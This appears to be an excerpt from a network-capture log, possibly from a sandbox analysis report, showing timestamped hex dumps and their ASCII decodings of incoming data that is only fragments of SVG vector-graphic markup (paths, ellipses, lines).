                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4386INData Raw: 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 34 32 2c 33 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                        Data Ascii: 0,1,.18,3.33"/><path class="cls-9" d="M549.42,323a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4402INData Raw: 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                        Data Ascii: 94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4418INData Raw: 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4434INData Raw: 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 36 31 2c 36 32 2e 37 39 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35
                                                                                                                                                                                                                                                        Data Ascii: 1,.15,2.67"/><path class="cls-9" d="M360.61,62.79a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4450INData Raw: 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 38 2e 30 35 2c 39 34 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                        Data Ascii: .47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M388.05,94.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4466INData Raw: 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 34 39 2c 31 32 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c
                                                                                                                                                                                                                                                        Data Ascii: .88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M415.49,125.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4482INData Raw: 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64
                                                                                                                                                                                                                                                        Data Ascii: 0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4498INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c
                                                                                                                                                                                                                                                        Data Ascii: 3,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4514INData Raw: 20 64 3d 22 4d 34 38 35 2e 33 2c 34 35 2e 35 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: d="M485.3,45.59a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4530INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 37 34 2c 37 37 2e 31 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ss="cls-9" d="M512.74,77.11a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4546INData Raw: 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2e 31 38 2c 31 30 38 2e 36 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 4,2.67"/><path class="cls-9" d="M540.18,108.63a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4562INData Raw: 31 39 37 63 36 2e 37 35 2d 32 2e 37 31 2c 31 36 2e 31 31 2d 35 2e 36 2c 32 31 2e 37 35 2d 31 30 2e 31 33 4c 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 32 37 2d 37 2e 36 33 2c 32 2e 34 38 2d 32 38 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39
                                                                                                                                                                                                                                                        Data Ascii: 197c6.75-2.71,16.11-5.6,21.75-10.13L900.16,174l4.27-7.63,2.48-28.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.9
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4578INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 2e 31 33 2e 37 38 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2e 36 36 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2e 34 35 2c 32 2c 32 2c 30 2c 30 2c 30 2c 31 2e 36 33 2c 30 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2d 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 2.5,2.5,0,0,0,.13.78,1.94,1.94,0,0,0,.37.66,1.75,1.75,0,0,0,.59.45,2,2,0,0,0,1.63,0,1.75,1.75,0,0,0,.59-.45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4594INData Raw: 37 32 20 36 36 33 2e 35 36 20 33 31 34 2e 32 35 20 36 37 31 2e 32 31 20 33 31 39 2e 30 32 20 36 37 30 2e 36 35 20 33 34 38 2e 39 33 22 2f 3e 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 35 22 20 78 31 3d 22 36 37 31 2e 32 31 22 20 79 31 3d 22 33 32 36 2e 31 32 22 20 78 32 3d 22 36 38 38 2e 37 31 22 20 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22
                                                                                                                                                                                                                                                        Data Ascii: 72 663.56 314.25 671.21 319.02 670.65 348.93"/><line class="cls-75" x1="671.21" y1="326.12" x2="688.71" y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4610INData Raw: 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 33 2e 34 35 22 20 72 78 3d 22 31 2e 32 22 20 72 79 3d 22 31 2e 35 34 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 38 2e 39 35 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69
                                                                                                                                                                                                                                                        Data Ascii: (-38.07)"/><ellipse class="cls-97" cx="848.64" cy="213.45" rx="1.2" ry="1.54" transform="translate(48.95 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><elli
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4626INData Raw: 2e 32 39 2c 30 2c 30 2c 31 2c 2e 33 36 2d 2e 33 31 41 31 2e 36 37 2c 31 2e 36 37 2c 30 2c 30 2c 31 2c 38 31 35 2e 36 39 2c 32 35 31 2e 37 38 5a 6d 2d 2e 30 39 2d 31 2e 33 39 63 2e 34 37 2e 33 39 2e 34 39 2e 34 36 2e 34 39 2e 36 73 2d 2e 31 35 2e 34 2d 2e 33 36 2e 33 34 2d 2e 31 33 2d 2e 30 35 2d 2e 34 36 2d 2e 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34
                                                                                                                                                                                                                                                        Data Ascii: .29,0,0,1,.36-.31A1.67,1.67,0,0,1,815.69,251.78Zm-.09-1.39c.47.39.49.46.49.6s-.15.4-.36.34-.13-.05-.46-.34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.4
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4642INData Raw: 2e 39 31 6c 2e 31 34 2c 32 2e 32 37 61 33 2e 34 32 2c 33 2e 34 32 2c 30 2c 30 2c 30 2d 33 2e 36 31 2e 30 39 63 2d 32 2c 31 2e 32 31 2d 33 2e 32 38 2c 33 2e 37 31 2d 33 2e 37 2c 33 2e 34 37 73 2d 2e 32 33 2d 32 2e 31 32 2c 31 2e 33 39 2d 33 2e 35 31 53 39 32 32 2e 36 36 2c 32 38 34 2e 35 39 2c 39 32 35 2e 32 35 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31
                                                                                                                                                                                                                                                        Data Ascii: .91l.14,2.27a3.42,3.42,0,0,0-3.61.09c-2,1.21-3.28,3.71-3.7,3.47s-.23-2.12,1.39-3.51S922.66,284.59,925.25,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-1
